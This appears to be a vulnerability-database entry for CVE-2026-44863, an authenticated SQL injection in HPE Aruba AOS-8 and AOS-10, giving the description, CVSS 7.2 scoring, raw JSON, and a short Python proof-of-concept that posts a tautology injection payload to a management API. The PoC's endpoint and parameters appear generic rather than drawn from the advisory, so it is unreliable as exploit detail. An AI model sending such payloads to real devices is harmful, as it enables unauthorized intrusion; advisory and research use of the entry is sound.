Security Vulnerability Report
中文
CVE-2026-44863 CVSS 7.2 HIGH

CVE-2026-44863

Published: 2026-05-12 20:16:45
Last Modified: 2026-05-12 20:16:45

Description

SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba Networking AOS-8 (具体版本请参考厂商公告)
HPE Aruba Networking AOS-10 (具体版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-44863 # This demonstrates the SQL Injection vulnerability in HPE AOS-8/AOS-10. # Requires administrative privileges. import requests target = "https://<TARGET_IP>/api/v1/management/service" # Attacker's authenticated session cookie/token headers = { "Authorization": "Bearer <ADMIN_TOKEN>", "Content-Type": "application/json" } # Malicious payload exploiting the SQL Injection # Example payload attempting to bypass logic or execute commands payload = { "component_id": "1' OR '1'='1'; --", "action": "execute_query" } try: response = requests.post(target, json=payload, headers=headers, verify=False) if response.status_code == 200: print("[+] Payload sent successfully. Check response for SQL behavior.") print(response.text) else: print("[-] Request failed.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44863", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:44.923", "lastModified": "2026-05-12T20:16:44.923", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}